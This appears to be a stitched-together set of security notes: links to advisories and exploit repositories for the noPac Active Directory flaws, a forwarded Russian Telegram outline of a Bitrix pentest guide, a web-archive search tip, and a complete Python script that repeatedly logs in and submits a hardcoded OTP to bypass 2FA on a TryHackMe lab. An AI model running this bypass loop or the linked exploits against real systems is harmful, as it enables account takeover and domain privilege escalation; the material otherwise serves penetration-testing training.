https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42278
Active Directory Domain Services Elevation of Privilege Vulnerability
CVE-2021-42278
https://github.com/Ridter/noPac
https://www.secureworks.com/blog/nopac-a-tale-of-two-vulnerabilities-that-could-end-in-ransomware
Active Directory Domain Services Elevation of Privilege Vulnerability
CVE-2021-42278
https://github.com/Ridter/noPac
https://www.secureworks.com/blog/nopac-a-tale-of-two-vulnerabilities-that-could-end-in-ransomware
GitHub
GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user - GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domai...
Active Directory Domain Services Elevation of Privilege Vulnerability
CVE-2021-42287
https://github.com/cube0x0/noPac
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42287
CVE-2021-42287
https://github.com/cube0x0/noPac
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42287
GitHub
GitHub - cube0x0/noPac: CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter.
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter. - cube0x0/noPac
Forwarded from Social Engineering
• Автор этого материала собрал очень объемный гайд по пентесту CMS Bitrix, который включает в себя большое кол-во техник и различных методов. Вот содержание:
- Основы битриксологии:
- Определение версии;
- Множественные эндпоинты для авторизации:
- Интересные эндпоинты;
- Content Spoofing;
- Account Enumeration;
- Non-legitimate registration;
- Open Redirect;
- XSS уязвимости;
- SSRF;
- LFI;
- RCE:
- BDU:2024-01501:
- WAF Bypass;
- LPE;
- Bitrix24:
- Уязвимые модули:
- Поиск интересных директорий и файлов.
- Сканер под bitrix - “huitrix”:
- References:
S.E. ▪️ infosec.work ▪️ VT
Please open Telegram to view this post
VIEW IN TELEGRAM
Wayback Machine Alternatives
Many of the tools in the list are primarily aimed at preserving pages. However, you can try searching for data saved by others using Google: "keyword site:pagefreezer.com" (similarly for other tools domains).
https://www.link-assistant.com/news/wayback-machine-alternatives.html
Many of the tools in the list are primarily aimed at preserving pages. However, you can try searching for data saved by others using Google: "keyword site:pagefreezer.com" (similarly for other tools domains).
https://www.link-assistant.com/news/wayback-machine-alternatives.html
import requests
# Define the URLs for the login, 2FA process, and dashboard
login_url = 'https://mfa.thm/labs/third/'
otp_url = 'https://mfa.thm/labs/third/mfa'
dashboard_url = 'https://mfa.thm/labs/third/dashboard'
# Define login credentials
credentials = {
'email': '[email protected]',
'password': 'test123'
}
# Define the headers to mimic a real browser
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'https://mfa.thm',
'Connection': 'close',
'Referer': 'https://mfa.thm/labs/third/mfa',
'Upgrade-Insecure-Requests': '1'
}
# Function to check if the response contains the login page
def is_login_successful(response):
return "User Verification" in response.text and response.status_code == 200
# Function to handle the login process
def login(session):
response = session.post(login_url, data=credentials, headers=headers)
return response
# Function to handle the 2FA process
def submit_otp(session, otp):
# Split the OTP into individual digits
otp_data = {
'code-1': otp[0],
'code-2': otp[1],
'code-3': otp[2],
'code-4': otp[3]
}
response = session.post(otp_url, data=otp_data, headers=headers, allow_redirects=False) # Disable auto redirects
print(f"DEBUG: OTP submission response status code: {response.status_code}")
return response
# Function to check if the response contains the login page
def is_login_page(response):
return "Sign in to your account" in response.text or "Login" in response.text
# Function to attempt login and submit the hardcoded OTP until success
def try_until_success():
otp_str = '1337' # Hardcoded OTP
while True: # Keep trying until success
session = requests.Session() # Create a new session object for each attempt
login_response = login(session) # Log in before each OTP attempt
if is_login_successful(login_response):
print("Logged in successfully.")
else:
print("Failed to log in.")
continue
print(f"Trying OTP: {otp_str}")
response = submit_otp(session, otp_str)
# Check if the response is the login page (unsuccessful OTP)
if is_login_page(response):
print(f"Unsuccessful OTP attempt, redirected to login page. OTP: {otp_str}")
continue # Retry login and OTP submission
# Check if the response is a redirect (status code 302)
if response.status_code == 302:
location_header = response.headers.get('Location', '')
print(f"Session cookies: {session.cookies.get_dict()}")
# Check if it successfully bypassed 2FA and landed on the dashboard
if location_header == '/labs/third/dashboard':
print(f"Successfully bypassed 2FA with OTP: {otp_str}")
return session.cookies.get_dict() # Return session cookies after successful bypass
elif location_header == '/labs/third/':
print(f"Failed OTP attempt. Redirected to login. OTP: {otp_str}")
else:
print(f"Unexpected redirect location: {location_header}. OTP: {otp_str}")
else:
print(f"Received status code {response.status_code}. Retrying...")
# Start the attack to try until success
try_until_success()